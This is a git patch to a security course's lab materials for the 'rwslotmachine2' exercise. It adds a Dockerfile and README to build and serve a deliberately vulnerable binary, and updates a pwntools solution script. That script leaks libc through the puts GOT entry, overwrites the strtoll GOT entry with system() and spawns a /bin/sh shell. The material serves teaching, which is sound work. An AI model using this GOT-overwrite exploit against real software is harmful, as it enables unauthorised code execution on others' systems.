From 3ac960bf8931653eb180f3371c6cae5cf3c30d38 Mon Sep 17 00:00:00 2001 From: Bianca Ioana Date: Wed, 11 Dec 2024 23:33:47 +0200 Subject: [PATCH] Add files for the Dockerfile and few modifications to the sol_got_overwrite.py for 02-rwslotmachine2 Signed-off-by: Bianca Ioana --- .dockerignore | 0 .../02-rwslotmachine2/sol/Dockerfile | 33 +++++++++++++++++ .../02-rwslotmachine2/sol/README.md | 17 +++++++++ .../sol/sol_got_overwrite.py | 37 ++++++++++++------- 4 files changed, 74 insertions(+), 13 deletions(-) create mode 100644 .dockerignore create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 0000000..e69de29 diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile new file mode 100644 index 0000000..6b7e796 --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/Dockerfile @@ -0,0 +1,33 @@ +# Build Stage +FROM gcc:latest AS build + +# Set working directory +WORKDIR /app + +# Copy the source code into the container +COPY rwslotmachine2.c . + +# Compile the source code into an executable +RUN gcc rwslotmachine2.c -o rwslotmachine2 -Wall -Wextra + +# Runtime Stage +# FROM debian:bullseye-slim +FROM ubuntu:latest + +# Install necessary runtime libraries +RUN apt-get update && apt-get install -y \ + libc6 \ + && rm -rf /var/lib/apt/lists/* + +# Set working directory +WORKDIR /app + +# Copy the compiled executable from the builder stage +# COPY --from=build /app/rwslotmachine2 . +COPY --from=build /app/rwslotmachine2 /app/rwslotmachine2 + +# Expose the port where the program will operate +EXPOSE 31345 + +# Run the program +CMD ["./rwslotmachine2"] diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md new file mode 100644 index 0000000..7e14ae5 --- /dev/null +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/README.md @@ -0,0 +1,17 @@ +## Building and Running + +1. Build the Docker image: + ```bash + docker build -t rwslotmachine2 . + ``` + + +2. Run the Docker image: + ```bash + docker run -p 31345:31345 rwslotmachine2 + ``` + +3. Test with the Python exploit: + ```bash + python3 sol_got_overwrite.py + ``` diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py index 7c0719e..cda9db0 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py @@ -13,21 +13,21 @@ def do_read(idx): - p.recvuntil(">") - p.sendline("1") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("]: ") - return int(p.recvuntil("\n")[:-1], 16) + p.recvuntil(b">") + p.sendline(b"1") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"]: ") + return int(p.recvuntil(b"\n")[:-1], 16) def do_write(idx, value): - p.recvuntil(">") - p.sendline("2") - p.recvuntil("index:") - p.sendline(str(idx)) - p.recvuntil("value:") - p.sendline(hex(value)) + p.recvuntil(b">") + p.sendline(b"2") + p.recvuntil(b"index:") + p.sendline(str(idx).encode()) + p.recvuntil(b"value:") + p.sendline(hex(value).encode()) slots_offset = binary.symbols["slots"] @@ -38,11 +38,22 @@ def do_write(idx, value): index_to_strtoll = (strtoll_got_offset - slots_offset) / 4 libc_leak = do_read(index_to_puts) +print(f"Libc leak: {hex(libc_leak)}") + libc_base = libc_leak - libc.symbols["puts"] +print(f"Libc base: {hex(libc_base)}") + system = libc_base + libc.symbols["system"] +print(f"System address: {hex(system)}") + +# Debugging the overwrite +print(f"Overwriting GOT entry for strtoll with address: {hex(system)}") do_write(index_to_strtoll, system) +# Debugging shell spawn +print("Exploitation completed, sending /bin/sh...") + -p.sendline("/bin/sh") +p.sendline(b"/bin/sh") p.interactive()